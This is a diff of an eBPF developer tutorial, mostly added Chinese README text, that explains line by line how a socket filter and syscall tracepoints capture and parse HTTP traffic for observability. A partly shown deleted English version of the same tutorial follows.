+在这里,代码从数据包中加载了以太网帧的类型字段,这个字段告诉我们数据包使用的网络层协议。然后,使用`__bpf_ntohs`函数将网络字节序的类型字段转换为主机字节序。接下来,代码检查类型字段是否等于IPv4的以太网帧类型(0x0800)。如果不等于,说明这个数据包不是IPv4数据包,直接返回0,放弃处理。 + +这里需要了解以下几个概念: + +- 以太网帧(Ethernet Frame):是数据链路层(第二层)的协议,用于在局域网中传输数据帧。以太网帧通常包括目标MAC地址、源MAC地址和帧类型字段。 +- 网络字节序(Network Byte Order):网络协议通常使用大端字节序(Big-Endian)来表示数据。因此,需要将从网络中接收到的数据转换为主机字节序,以便在主机上正确解释数据。 +- IPv4帧类型(ETH_P_IP):表示以太网帧中包含的协议类型字段,0x0800表示IPv4。 + +```c +if (ip_is_fragment(skb, nhoff)) + return 0; +``` + +这一部分的代码检查是否处理IP分片。IP分片是将较大的IP数据包分割成多个小片段以进行传输的机制。在这里,如果数据包是IP分片,则直接返回0,表示不处理分片,只处理完整的数据包。 + +```c +static inline int ip_is_fragment(struct __sk_buff *skb, __u32 nhoff) +{ + __u16 frag_off; + + bpf_skb_load_bytes(skb, nhoff + offsetof(struct iphdr, frag_off), &frag_off, 2); + frag_off = __bpf_ntohs(frag_off); + return frag_off & (IP_MF | IP_OFFSET); +} +``` + +上述代码是一个辅助函数,用于检查传入的IPv4数据包是否为IP分片。IP分片是一种机制,当IP数据包的大小超过了网络的最大传输单元(MTU),路由器会将其分割成多个较小的片段,以便在网络上进行传输。这个函数的目的是检查数据包的分片标志(Fragmentation Flag)以及片偏移(Fragment Offset)字段,以确定是否为分片。 + +下面是代码的逐行解释: + +1. `__u16 frag_off;`:定义一个16位无符号整数变量`frag_off`,用于存储片偏移字段的值。 +2. `bpf_skb_load_bytes(skb, nhoff + offsetof(struct iphdr, frag_off), &frag_off, 2);`:这行代码使用`bpf_skb_load_bytes`函数从数据包中加载IPv4头部的片偏移字段(`frag_off`),并加载2个字节。`nhoff`是IPv4头部在数据包中的偏移量,`offsetof(struct iphdr, frag_off)`用于计算片偏移字段在IPv4头部中的偏移量。 +3. `frag_off = __bpf_ntohs(frag_off);`:将加载的片偏移字段从网络字节序(Big-Endian)转换为主机字节序。网络协议通常使用大端字节序表示数据,而主机可能使用大端或小端字节序。这里将片偏移字段转换为主机字节序,以便进一步处理。 +4. `return frag_off & (IP_MF | IP_OFFSET);`:这行代码通过使用位运算检查片偏移字段的值,以确定是否为IP分片。具体来说,它使用位与运算符`&`将片偏移字段与两个标志位进行位与运算: + - `IP_MF`:表示"更多分片"标志(More Fragments)。如果这个标志位被设置为1,表示数据包是分片的一部分,还有更多分片。 + - `IP_OFFSET`:表示片偏移字段。如果片偏移字段不为0,表示数据包是分片的一部分,且具有片偏移值。 + 如果这两个标志位中的任何一个被设置为1,那么结果就不为零,说明数据包是IP分片。如果都为零,说明数据包不是分片。 + +需要注意的是,IP头部的片偏移字段以8字节为单位,所以实际的片偏移值需要左移3位来得到字节偏移。此外,IP头部的"更多分片"标志(IP_MF)表示数据包是否有更多的分片,通常与片偏移字段一起使用来指示整个数据包的分片情况。这个函数只关心这两个标志位,如果其中一个标志被设置,就认为是IP分片。 + +```c +bpf_skb_load_bytes(skb, ETH_HLEN, &hdr_len, sizeof(hdr_len)); +hdr_len &= 0x0f; +hdr_len *= 4; +``` + +这一部分的代码从数据包中加载IP头部的长度字段。IP头部长度字段包含了IP头部的长度信息,以4字节为单位,需要将其转换为字节数。这里通过按位与和乘以4来进行转换。 + +需要了解: + +- IP头部(IP Header):IP头部包含了关于数据包的基本信息,如源IP地址、目标IP地址、协议类型和头部校验和等。头部长度字段(IHL,Header Length)表示IP头部的长度,以4字节为单位,通常为20字节(5个4字节的字)。 + +```c +if (hdr_len < sizeof(struct iphdr)) +{ + return 0; +} +``` + +这段代码检查IP头部的长度是否满足最小长度要求,通常IP头部的最小长度是20字节。如果IP头部的长度小于20字节,说明数据包不完整或损坏,直接返回0,放弃处理。 + +需要了解: + +- `struct iphdr`:这是Linux内核中定义的结构体,表示IPv4头部的格式。它包括了版本、头部长度、服务类型、总长度、 + +标识符、标志位、片偏移、生存时间、协议、头部校验和、源IP地址和目标IP地址等字段。 + +```c +bpf_skb_load_bytes(skb, nhoff + offsetof(struct iphdr, protocol), &ip_proto, 1); +if (ip_proto != IPPROTO_TCP) +{ + return 0; +} +``` + +在这里,代码从数据包中加载IP头部中的协议字段,以确定数据包使用的传输层协议。然后,它检查协议字段是否为TCP协议(IPPROTO_TCP)。如果不是TCP协议,说明不是HTTP请求或响应,直接返回0。 + +需要了解: + +- 传输层协议:IP头部中的协议字段指示了数据包所使用的传输层协议,例如TCP、UDP或ICMP。 + +```c +tcp_hdr_len = nhoff + hdr_len; +``` + +这行代码计算了TCP头部的偏移量。它将以太网帧头部的长度(`nhoff`)与IP头部的长度(`hdr_len`)相加,得到TCP头部的起始位置。 + +```c +bpf_skb_load_bytes(skb, nhoff + 0, &verlen, 1); +``` + +这行代码从数据包中加载TCP头部的第一个字节,该字节包含了TCP头部长度信息。这个长度字段以4字节为单位,需要进行后续的转换。 + +```c +bpf_skb_load_bytes(skb, nhoff + offsetof(struct iphdr, tot_len), &tlen, sizeof(tlen)); +``` + +这行代码从数据包中加载IP头部的总长度字段。IP头部总长度字段表示整个IP数据包的长度,包括IP头部和数据部分。 + +```c +__u8 doff; +bpf_skb_load_bytes(skb, tcp_hdr_len + offsetof(struct __tcphdr, ack_seq) + 4, &doff, sizeof(doff)); +doff &= 0xf0; +doff >>= 4; +doff *= 4; +``` + +这段代码用于计算TCP头部的长度。它加载TCP头部中的数据偏移字段(Data Offset,也称为头部长度字段),该字段表示TCP头部的长度以4字节为单位。代码将偏移字段的高四位清零,然后将其右移4位,最后乘以4,得到TCP头部的实际长度。 + +需要了解: + +- TCP头部(TCP Header):TCP头部包含了TCP协议相关的信息,如源端口、目标端口、序列号、确认号、标志位(如SYN、ACK、FIN等)、窗口大小和校验和等。 + +```c +payload_offset = ETH_HLEN + hdr_len + doff; +payload_length = __bpf_ntohs(tlen) - hdr_len - doff; +``` + +这两行代码计算HTTP请求的载荷(payload)的偏移量和长度。它们将以太网帧头部长度、IP头部长度和TCP头部长度相加,得到HTTP请求的数据部分的偏移量,然后通过减去总长度、IP头部长度和TCP头部长度,计算出HTTP请求数据的长度。 + +需要了解: + +- HTTP请求载荷(Payload):HTTP请求中包含的实际数据部分,通常是HTTP请求头和请求体。 + +```c +char line_buffer[7]; +if (payload_length < 7 || payload_offset < 0) +{ + return 0; +} +bpf_skb_load_bytes(skb, payload_offset, line_buffer, 7); +bpf_printk("%d len %d buffer: %s", payload_offset, payload_length, line_buffer); +``` + +这部分代码用于加载HTTP请求行的前7个字节,存储在名为`line_buffer`的字符数组中。然后,它检查HTTP请求数据的长度是否小于7字节或偏移量是否为负数,如果满足这些条件,说明HTTP请求不完整,直接返回0。最后,它使用`bpf_printk`函数将HTTP请求行的内容打印到内核日志中,以供调试和分析。 + +```c +if (bpf_strncmp(line_buffer, 3, "GET") != 0 && + bpf_strncmp(line_buffer, 4, "POST") != 0 && + bpf_strncmp(line_buffer, 3, "PUT") != 0 && + bpf_strncmp(line_buffer, 6, "DELETE") != 0 && + bpf_strncmp(line_buffer, 4, "HTTP") != 0) +{ + return 0; +} +``` + +> 注意:bpf_strncmp 这个内核 helper 在 5.17 版本中才被引入,如果你的内核版本低于 5.17,可以手动匹配字符串来实现相同的功能。 + +这段代码使用`bpf_strncmp`函数比较`line_buffer`中的数据与HTTP请求方法(GET、POST、PUT、DELETE、HTTP)是否匹配。如果不匹配,说明不是HTTP请求,直接返回0,放弃处理。 + +```c +e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0); +if (!e) + return 0; +``` + +这部分代码尝试从BPF环形缓冲区中保留一块内存以存储事件信息。如果无法保留内存块,返回0。BPF环形缓冲区用于在eBPF程序和用户空间之间传递事件数据。 + +需要了解: + +- BPF环形缓冲区:BPF环形缓冲区是一种在eBPF程序和用户空间之间传递数据的机制。它可以用来存储事件信息,以便用户空间应用程序进行进一步处理或分析。 + +```c +e->ip_proto = ip_proto; +bpf_skb_load_bytes(skb, nhoff + hdr_len, &(e->ports), 4); +e->pkt_type = skb->pkt_type; +e->ifindex = skb->ifindex; + +e->payload_length = payload_length; +bpf_skb_load_bytes(skb, payload_offset, e->payload, MAX_BUF_SIZE); + +bpf_skb_load_bytes(skb, nhoff + offsetof(struct iphdr, saddr), &(e->src_addr), 4); +bpf_skb_load_bytes(skb, nhoff + offsetof(struct iphdr, daddr), &(e->dst_addr), 4); +bpf_ringbuf_submit(e, 0); + +return skb->len; +``` + +最后,这段代码将捕获到的事件信息存储在`e`结构体中,并将 + +其提交到BPF环形缓冲区。它包括了捕获的IP协议、源端口和目标端口、数据包类型、接口索引、载荷长度、源IP地址和目标IP地址等信息。最后,它返回数据包的长度,表示成功处理了数据包。 + +这段代码主要用于将捕获的事件信息存储起来,以便后续的处理和分析。 BPF环形缓冲区用于将这些信息传递到用户空间,供用户空间应用程序进一步处理或记录。 + +总结:这段eBPF程序的主要任务是捕获HTTP请求,它通过解析数据包的以太网帧、IP头部和TCP头部来确定数据包是否包含HTTP请求,并将有关请求的信息存储在`so_event`结构体中,然后提交到BPF环形缓冲区。这是一种高效的方法,可以在内核层面捕获HTTP流量,适用于网络监控和安全分析等应用。 + +### 潜在缺陷 + +上述代码也存在一些潜在的缺陷,其中一个主要缺陷是它无法处理跨多个数据包的URL。 + +- 跨包URL:代码中通过解析单个数据包来检查HTTP请求中的URL,如果HTTP请求的URL跨足够多的数据包,那么只会检查第一个数据包中的URL部分。这会导致丢失或部分记录那些跨多个数据包的长URL。 + +解决这个问题的方法通常需要对多个数据包进行重新组装,以还原完整的HTTP请求。这可能需要在eBPF程序中实现数据包的缓存和组装逻辑,并在检测到HTTP请求结束之前等待并收集所有相关数据包。这需要更复杂的逻辑和额外的内存来处理跨多个数据包的情况。 + +### 用户态代码 + +用户态代码的主要目的是创建一个原始套接字(raw socket),然后将先前在内核中定义的eBPF程序附加到该套接字上,从而允许eBPF程序捕获和处理从该套接字接收到的网络数据包,例如: + +```c + /* Create raw socket for localhost interface */ + sock = open_raw_sock(interface); + if (sock < 0) { + err = -2; + fprintf(stderr, "Failed to open raw socket\n"); + goto cleanup; + } + + /* Attach BPF program to raw socket */ + prog_fd = bpf_program__fd(skel->progs.socket_handler); + if (setsockopt(sock, SOL_SOCKET, SO_ATTACH_BPF, &prog_fd, sizeof(prog_fd))) { + err = -3; + fprintf(stderr, "Failed to attach to raw socket\n"); + goto cleanup; + } +``` + +1. `sock = open_raw_sock(interface);`:这行代码调用了一个自定义的函数`open_raw_sock`,该函数用于创建一个原始套接字。原始套接字允许用户态应用程序直接处理网络数据包,而不经过协议栈的处理。函数`open_raw_sock`可能需要一个参数 `interface`,用于指定网络接口,以便确定从哪个接口接收数据包。如果创建套接字失败,它将返回一个负数,否则返回套接字的文件描述符`sock`。 +2. 如果`sock`的值小于0,表示打开原始套接字失败,那么将`err`设置为-2,并在标准错误流上输出一条错误信息。 +3. `prog_fd = bpf_program__fd(skel->progs.socket_handler);`:这行代码获取之前在eBPF程序定义中的套接字过滤器程序(`socket_handler`)的文件描述符,以便后续将它附加到套接字上。`skel`是一个eBPF程序对象的指针,可以通过它来访问程序集合。 +4. `setsockopt(sock, SOL_SOCKET, SO_ATTACH_BPF, &prog_fd, sizeof(prog_fd))`:这行代码使用`setsockopt`系统调用将eBPF程序附加到原始套接字。它设置了`SO_ATTACH_BPF`选项,将eBPF程序的文件描述符传递给该选项,以便内核知道要将哪个eBPF程序应用于这个套接字。如果附加成功,套接字将开始捕获和处理从中接收到的网络数据包。 +5. 如果`setsockopt`失败,它将`err`设置为-3,并在标准错误流上输出一条错误信息。 + +### 编译运行 + +完整的源代码可以在 中找到。关于如何安装依赖,请参考: 编译运行上述代码: + +```console +$ git submodule update --init --recursive +$ make + BPF .output/sockfilter.bpf.o + GEN-SKEL .output/sockfilter.skel.h + CC .output/sockfilter.o + BINARY sockfilter +$ sudo ./sockfilter +... +``` + +在另外一个窗口中,使用 python 启动一个简单的 web server: + +```console +python3 -m http.server +Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... +127.0.0.1 - - [18/Sep/2023 01:05:52] "GET / HTTP/1.1" 200 - +``` + +可以使用 curl 发起请求: + +```c +$ curl http://0.0.0.0:8000/ + + + + +Directory listing for / +.... +``` + +在 eBPF 程序中,可以看到打印出了 HTTP 请求的内容: + +```console +127.0.0.1:34552(src) -> 127.0.0.1:8000(dst) +payload: GET / HTTP/1.1 +Host: 0.0.0.0:8000 +User-Agent: curl/7.88.1 +... +127.0.0.1:8000(src) -> 127.0.0.1:34552(dst) +payload: HTTP/1.0 200 OK +Server: SimpleHTTP/0.6 Python/3.11.4 +... +``` + +分别包含了请求和响应的内容。 + +## 使用 eBPF syscall tracepoint 来捕获 HTTP 流量 + +eBPF 提供了一种强大的机制,允许我们在内核级别追踪系统调用。在这个示例中,我们将使用 eBPF 追踪 accept 和 read 系统调用,以捕获 HTTP 流量。由于篇幅有限,这里我们仅仅对代码框架做简要的介绍。 + +```c +struct +{ + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, 4096); + __type(key, u64); + __type(value, struct accept_args_t); +} active_accept_args_map SEC(".maps"); + +// 定义在 accept 系统调用入口的追踪点 +SEC("tracepoint/syscalls/sys_enter_accept") +int sys_enter_accept(struct trace_event_raw_sys_enter *ctx) +{ + u64 id = bpf_get_current_pid_tgid(); + // ... 获取和存储 accept 调用的参数 + bpf_map_update_elem(&active_accept_args_map, &id, &accept_args, BPF_ANY); + return 0; +} + +// 定义在 accept 系统调用退出的追踪点 +SEC("tracepoint/syscalls/sys_exit_accept") +int sys_exit_accept(struct trace_event_raw_sys_exit *ctx) +{ + // ... 处理 accept 调用的结果 + struct accept_args_t *args = + bpf_map_lookup_elem(&active_accept_args_map, &id); + // ... 获取和存储 accept 调用获得的 socket 文件描述符 + __u64 pid_fd = ((__u64)pid << 32) | (u32)ret_fd; + bpf_map_update_elem(&conn_info_map, &pid_fd, &conn_info, BPF_ANY); + // ... +} + +struct +{ + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, 4096); + __type(key, u64); + __type(value, struct data_args_t); +} active_read_args_map SEC(".maps"); + +// 定义在 read 系统调用入口的追踪点 +SEC("tracepoint/syscalls/sys_enter_read") +int sys_enter_read(struct trace_event_raw_sys_enter *ctx) +{ + // ... 获取和存储 read 调用的参数 + bpf_map_update_elem(&active_read_args_map, &id, &read_args, BPF_ANY); + return 0; +} + +// 辅助函数,检查是否为 HTTP 连接 +static inline bool is_http_connection(const char *line_buffer, u64 bytes_count) +{ + // ... 检查数据是否为 HTTP 请求或响应 +} + +// 辅助函数,处理读取的数据 +static inline void process_data(struct trace_event_raw_sys_exit *ctx, + u64 id, const struct data_args_t *args, u64 bytes_count) +{ + // ... 处理读取的数据,检查是否为 HTTP 流量,并发送事件 + if (is_http_connection(line_buffer, bytes_count)) + { + // ... + bpf_probe_read_kernel(&event.msg, read_size, args->buf); + // ... + bpf_perf_event_output(ctx, &events, BPF_F_CURRENT_CPU, + &event, sizeof(struct socket_data_event_t)); + } +} + +// 定义在 read 系统调用退出的追踪点 +SEC("tracepoint/syscalls/sys_exit_read") +int sys_exit_read(struct trace_event_raw_sys_exit *ctx) +{ + // ... 处理 read 调用的结果 + struct data_args_t *read_args = bpf_map_lookup_elem(&active_read_args_map, &id); + if (read_args != NULL) + { + process_data(ctx, id, read_args, bytes_count); + } + // ... + return 0; +} + +char _license[] SEC("license") = "GPL"; +``` + +这段代码简要展示了如何使用eBPF追踪Linux内核中的系统调用来捕获HTTP流量。以下是对代码的hook位置和流程的详细解释,以及需要hook哪些系统调用来实现完整的请求追踪: + +### **Hook 位置和流程** + +- 该代码使用了eBPF的Tracepoint功能,具体来说,它定义了一系列的eBPF程序,并将它们绑定到了特定的系统调用的Tracepoint上,以捕获这些系统调用的入口和退出事件。 + +- 首先,它定义了两个eBPF哈希映射(`active_accept_args_map`和`active_read_args_map`)来存储系统调用参数。这些映射用于跟踪`accept`和`read`系统调用。 + +- 接着,它定义了多个Tracepoint追踪程序,其中包括: + - `sys_enter_accept`:定义在`accept`系统调用的入口处,用于捕获`accept`系统调用的参数,并将它们存储在哈希映射中。 + - `sys_exit_accept`:定义在`accept`系统调用的退出处,用于处理`accept`系统调用的结果,包括获取和存储新的套接字文件描述符以及建立连接的相关信息。 + - `sys_enter_read`:定义在`read`系统调用的入口处,用于捕获`read`系统调用的参数,并将它们存储在哈希映射中。 + - `sys_exit_read`:定义在`read`系统调用的退出处,用于处理`read`系统调用的结果,包括检查读取的数据是否为HTTP流量,如果是,则发送事件。 + +- 在`sys_exit_accept`和`sys_exit_read`中,还涉及一些数据处理和事件发送的逻辑,例如检查数据是否为HTTP连接,组装事件数据,并使用`bpf_perf_event_output`将事件发送到用户空间供进一步处理。 + +### **需要 Hook 的完整系统调用** + +要实现完整的HTTP请求追踪,通常需要hook的系统调用包括: + +- `socket`:用于捕获套接字创建,以追踪新的连接。 +- `bind`:用于获取绑定的端口信息。 +- `listen`:用于开始监听连接请求。 +- `accept`:用于接受连接请求,获取新的套接字文件描述符。 +- `read`:用于捕获接收到的数据,以检查其中是否包含 HTTP 请求。 +- `write`:用于捕获发送的数据,以检查其中是否包含 HTTP 响应。 + +上述代码已经涵盖了`accept`和`read`系统调用的追踪。要完整实现HTTP请求的追踪,还需要hook其他系统调用,并实现相应的逻辑来处理这些系统调用的参数和结果。 + +完整的源代码可以在 中找到。 + +## 总结 + +在当今复杂的技术环境中,系统的可观测性变得至关重要,特别是在微服务和云原生应用程序的背景下。本文探讨了如何利用eBPF技术来追踪七层协议,以及在这个过程中可能面临的挑战和解决方案。以下是对本文内容的总结: + +1. **背景介绍**: + - 现代应用程序通常由多个微服务和分布式组件组成,因此观测整个系统的行为至关重要。 + - 七层协议(如HTTP、gRPC、MQTT等)提供了深入了解应用程序交互的详细信息,但监控这些协议通常具有挑战性。 + +2. **eBPF技术的作用**: + - eBPF允许开发者在不修改或插入应用程序代码的情况下,深入内核层来实时观测和分析系统行为。 + - eBPF技术为监控七层协议提供了一个强大的工具,特别适用于微服务环境。 + +3. **追踪七层协议**: + - 本文介绍了如何追踪HTTP等七层协议的挑战,包括协议的复杂性和动态性。 + - 传统的网络监控工具难以应对七层协议的复杂性。 + +4. **eBPF的应用**: + - eBPF提供两种主要方法来追踪七层协议:socket filter和syscall trace。 + - 这两种方法可以帮助捕获HTTP等协议的网络请求数据,并分析它们。 + +5. **eBPF实践教程**: + - 本文提供了一个实际的eBPF教程,演示如何使用eBPF socket filter或syscall trace来捕获和分析HTTP流量。 + - 教程内容包括开发eBPF程序、使用eBPF工具链和实施HTTP请求的追踪。 + +通过这篇文章,读者可以获得深入了解如何使用eBPF技术来追踪七层协议,尤其是HTTP流量的知识。这将有助于更好地监控和分析网络流量,从而提高应用程序性能和安全性。如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 + +> 原文地址: 转载请注明出处。 diff --git a/src/23-http/README_en.md b/src/23-http/README_en.md deleted file mode 100644 index a17c8ed..0000000 --- a/src/23-http/README_en.md +++ /dev/null @@ -1,639 +0,0 @@ -# L7 Tracing with eBPF: HTTP and Beyond via Socket Filters and Syscall Tracepoints - -In today's technology landscape, with the rise of microservices, cloud-native applications, and complex distributed systems, observability of systems has become a crucial factor in ensuring their health, performance, and security. Especially in a microservices architecture, application components may be distributed across multiple containers and servers, making traditional monitoring methods often insufficient to provide the depth and breadth needed to fully understand the behavior of the system. This is where observing seven-layer protocols such as HTTP, gRPC, MQTT, and more becomes particularly important. - -Seven-layer protocols provide detailed insights into how applications interact with other services and components. In a microservices environment, understanding these interactions is vital, as they often serve as the root causes of performance bottlenecks, failures, and security issues. However, monitoring these protocols is not a straightforward task. Traditional network monitoring tools like tcpdump, while effective at capturing network traffic, often fall short when dealing with the complexity and dynamism of seven-layer protocols. - -This is where eBPF (extended Berkeley Packet Filter) technology comes into play. eBPF allows developers and operators to delve deep into the kernel layer, observing and analyzing system behavior in real-time without the need to modify or insert instrumentation into application code. This presents a unique opportunity to handle application layer traffic more simply and efficiently, particularly in microservices environments. - -In this tutorial, we will delve into the following: - -- Tracking seven-layer protocols such as HTTP and the challenges associated with them. -- eBPF's socket filter and syscall tracing: How these two technologies assist in tracing HTTP network request data at different kernel layers, and the advantages and limitations of each. -- eBPF practical tutorial: How to develop an eBPF program and utilize eBPF socket filter or syscall tracing to capture and analyze HTTP traffic. - -As network traffic increases and applications grow in complexity, gaining a deeper understanding of seven-layer protocols becomes increasingly important. Through this tutorial, you will acquire the necessary knowledge and tools to more effectively monitor and analyze your network traffic, ultimately enhancing the performance of your applications and servers. - -This article is part of the eBPF Developer Tutorial, and for more detailed content, you can visit [here](https://eunomia.dev/tutorials/). The source code is available on the [GitHub repository](https://github.com/eunomia-bpf/bpf-developer-tutorial). - -## Challenges in Tracking HTTP, HTTP/2, and Other Seven-Layer Protocols - -In the modern networking environment, seven-layer protocols extend beyond just HTTP. In fact, there are many seven-layer protocols such as HTTP/2, gRPC, MQTT, WebSocket, AMQP, and SMTP, each serving critical roles in various application scenarios. These protocols provide detailed insights into how applications interact with other services and components. However, tracking these protocols is not a simple task, especially within complex distributed systems. - -1. **Diversity and Complexity**: Each seven-layer protocol has its specific design and workings. For example, gRPC utilizes HTTP/2 as its transport protocol and supports multiple languages, while MQTT is a lightweight publish/subscribe messaging transport protocol designed for low-bandwidth and unreliable networks. - -2. **Dynamism**: Many seven-layer protocols are dynamic, meaning their behavior can change based on network conditions, application requirements, or other factors. - -3. **Encryption and Security**: With increased security awareness, many seven-layer protocols employ encryption technologies such as TLS/SSL. This introduces additional challenges for tracking and analysis, as decrypting traffic is required for in-depth examination. - -4. **High-Performance Requirements**: In high-traffic production environments, capturing and analyzing traffic for seven-layer protocols can impact system performance. Traditional network monitoring tools may struggle to handle a large number of concurrent sessions. - -5. **Data Completeness and Continuity**: Unlike tools like tcpdump, which capture individual packets, tracking seven-layer protocols requires capturing complete sessions, which may involve multiple packets. This necessitates tools capable of correctly reassembling and parsing these packets to provide a continuous session view. - -6. **Code Intrusiveness**: To gain deeper insights into the behavior of seven-layer protocols, developers may need to modify application code to add monitoring functionalities. This not only increases development and maintenance complexity but can also impact application performance. - -As mentioned earlier, eBPF provides a powerful solution, allowing us to capture and analyze seven-layer protocol traffic in the kernel layer without modifying application code. This approach not only offers insights into system behavior but also ensures optimal performance and efficiency. This is why eBPF has become the preferred technology for modern observability tools, especially in production environments that demand high performance and low latency. - -## eBPF Socket Filter vs. Syscall Tracing: In-Depth Analysis and Comparison - -### **eBPF Socket Filter** - -**What Is It?** -eBPF socket filter is an extension of the classic Berkeley Packet Filter (BPF) that allows for more advanced packet filtering directly within the kernel. It operates at the socket layer, enabling fine-grained control over which packets are processed by user-space applications. - -**Key Features:** - -- **Performance**: By handling packets directly within the kernel, eBPF socket filters reduce the overhead of context switches between user and kernel spaces. -- **Flexibility**: eBPF socket filters can be attached to any socket, providing a universal packet filtering mechanism for various protocols and socket types. -- **Programmability**: Developers can write custom eBPF programs to define complex filtering logic beyond simple packet matching. - -**Use Cases:** - -- **Traffic Control**: Restrict or prioritize traffic based on custom conditions. -- **Security**: Discard malicious packets before they reach user-space applications. -- **Monitoring**: Capture specific packets for analysis without affecting other traffic. - -### **eBPF Syscall Tracing** - -**What Is It?** -System call tracing using eBPF allows monitoring and manipulation of system calls made by applications. System calls are the primary mechanism through which user-space applications interact with the kernel, making tracing them a valuable way to understand application behavior. - -**Key Features:** - -- **Granularity**: eBPF allows tracing specific system calls, even specific parameters within those system calls. -- **Low Overhead**: Compared to other tracing methods, eBPF syscall tracing is designed to have minimal performance impact. -- **Security**: Kernel validates eBPF programs to ensure they do not compromise system stability. - -**How It Works:** -eBPF syscall tracing typically involves attaching eBPF programs to tracepoints or kprobes related to the system calls being traced. When the traced system call is invoked, the eBPF program is executed, allowing data collection or even modification of system call parameters. - -### Comparison of eBPF Socket Filter and Syscall Tracing - -| Aspect | eBPF Socket Filter | eBPF Syscall Tracing | -| ------ | ------------------- | --------------------- | -| **Operational Layer** | Socket layer, primarily dealing with network packets received from or sent to sockets. | System call layer, monitoring and potentially altering the behavior of system calls made by applications. | -| **Primary Use Cases** | Mainly used for filtering, monitoring, and manipulation of network packets. | Used for performance analysis, security monitoring, and debugging of interactions with the network. | -| **Granularity** | Focuses on individual network packets. | Can monitor a wide range of system activities, including those unrelated to networking. | -| **Tracking HTTP Traffic** | Can be used to filter and capture HTTP packets passed through sockets. | Can trace system calls associated with networking operations, which may include HTTP traffic. | - -In summary, both eBPF socket filters and syscall tracing can be used to trace HTTP traffic, but socket filters are more direct and suitable for this purpose. However, if you are interested in the broader context of how an application interacts with the system (e.g., which system calls lead to HTTP traffic), syscall tracing can be highly valuable. In many advanced observability setups, both tools may be used simultaneously to provide a comprehensive view of system and network behavior. - -## Capturing HTTP Traffic with eBPF Socket Filter - -eBPF code consists of user-space and kernel-space components, and here we primarily focus on the kernel-space code. Below is the main logic for capturing HTTP traffic in the kernel using eBPF socket filter technology, and the complete code is provided: - -```c -SEC("socket") -int socket_handler(struct __sk_buff *skb) -{ - struct so_event *e; - __u8 verlen; - __u16 proto; - __u32 nhoff = ETH_HLEN; - __u32 ip_proto = 0; - __u32 tcp_hdr_len = 0; - __u16 tlen; - __u32 payload_offset = 0; - __u32 payload_length = 0; - __u8 hdr_len; - - bpf_skb_load_bytes(skb, 12, &proto, 2); - proto = __bpf_ntohs(proto); - if (proto != ETH_P_IP) - return 0; - - if (ip_is_fragment(skb, nhoff)) - return 0; - - // ip4 header lengths are variable - // access ihl as a u8 (linux/include/linux/skbuff.h) - bpf_skb_load_bytes(skb, ETH_HLEN, &hdr_len, sizeof(hdr_len)); - hdr_len &= 0x0f; - hdr_len *= 4; - - /* verify hlen meets minimum size requirements */ - if (hdr_len < sizeof(struct iphdr)) - { - return 0; - } - - bpf_skb_load_bytes(skb, nhoff + offsetof(struct iphdr, protocol), &ip_proto, 1); - - if (ip_proto != IPPROTO_TCP) - { - return 0; - } - - tcp_hdr_len = nhoff + hdr_len; - bpf_skb_load_bytes(skb, nhoff + 0, &verlen, 1); - bpf_skb_load_bytes(skb, nhoff + offsetof(struct iphdr, tot_len), &tlen, sizeof(tlen)); - - __u8 doff; - bpf_skb_load_bytes(skb, tcp_hdr_len + offsetof(struct __tcphdr, ack_seq) + 4, &doff, sizeof(doff)); // read the first byte past __tcphdr->ack_seq, we can't do offsetof bit fields - doff &= 0xf0; // clean-up res1 - doff >>= 4; // move the upper 4 bits to low - doff *= 4; // convert to bytes length - - payload_offset = ETH_HLEN + hdr_len + doff; - payload_length = __bpf_ntohs(tlen) - hdr_len - doff; - - char line_buffer[7]; - if (payload_length < 7 || payload_offset < 0) - { - return 0; - } - bpf_skb_load_bytes(skb, payload_offset, line_buffer, 7); - bpf_printk("%d len %d buffer: %s", payload_offset, payload_length, line_buffer); - if (bpf_strncmp(line_buffer, 3, "GET") != 0 && - bpf_strncmp(line_buffer, 4, "POST") != 0 && - bpf_strncmp(line_buffer, 3, "PUT") != 0 && - bpf_strncmp(line_buffer, 6, "DELETE") != 0 && - bpf_strncmp(line_buffer, 4, "HTTP") != 0) - { - return 0; - } - - /* reserve sample from BPF ringbuf */ - e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0); - if (!e) - return 0; - - e->ip_proto = ip_proto; - bpf_skb_load_bytes(skb, nhoff + hdr_len, &(e->ports), 4); - e->pkt_type = skb->pkt_type; - e->ifindex = skb->ifindex; - - e->payload_length = payload_length; - bpf_skb_load_bytes(skb, payload_offset, e->payload, MAX_BUF_SIZE); - - bpf_skb_load_bytes(skb, nhoff + offsetof(struct iphdr, saddr), &(e->src_addr), 4); - bpf_skb_load_bytes(skb, nhoff + offsetof(struct iphdr, daddr), &(e->dst_addr), 4); - bpf_ringbuf_submit(e, 0); - - return skb->len; -} -``` - -When analyzing this eBPF program, we will explain it in detail according to the content of each code block and provide relevant background knowledge: - -```c -SEC("socket") -int socket_handler(struct __sk_buff *skb) -{ - // ... -} -``` - -This is the entry point of the eBPF program, defining a function named `socket_handler` that the kernel uses to handle incoming network packets. This function is located in an eBPF section named `socket`, indicating that it is intended for socket handling. - -```c -struct so_event *e; -__u8 verlen; -__u16 proto; -__u32 nhoff = ETH_HLEN; -__u32 ip_proto = 0; -__u32 tcp_hdr_len = 0; -__u16 tlen; -__u32 payload_offset = 0; -__u32 payload_length = 0; -__u8 hdr_len; -``` - -In this code block, several variables are defined to store information needed during packet processing. These variables include `struct so_event *e` for storing event information, `verlen`, `proto`, `nhoff`, `ip_proto`, `tcp_hdr_len`, `tlen`, `payload_offset`, `payload_length`, and `hdr_len` for storing packet information. - -- `struct so_event *e;`: This is a pointer to the `so_event` structure for storing captured event information. The specific definition of this structure is located elsewhere in the program. -- `__u8 verlen;`, `__u16 proto;`, `__u32 nhoff = ETH_HLEN;`: These variables are used to store various pieces of information, such as protocol types, packet offsets, etc. `nhoff` is initialized to the length of the Ethernet frame header, typically 14 bytes, as Ethernet frame headers include destination MAC address, source MAC address, and frame type fields. -- `__u32 ip_proto = 0;`: This variable is used to store the type of the IP protocol and is initialized to 0. -- `__u32 tcp_hdr_len = 0;`: This variable is used to store the length of the TCP header and is initialized to 0. -- `__u16 tlen;`: This variable is used to store the total length of the IP packet. -- `__u32 payload_offset = 0;`, `__u32 payload_length = 0;`: These two variables are used to store the offset and length of the HTTP request payload. -- `__u8 hdr_len;`: This variable is used to store the length of the IP header. - 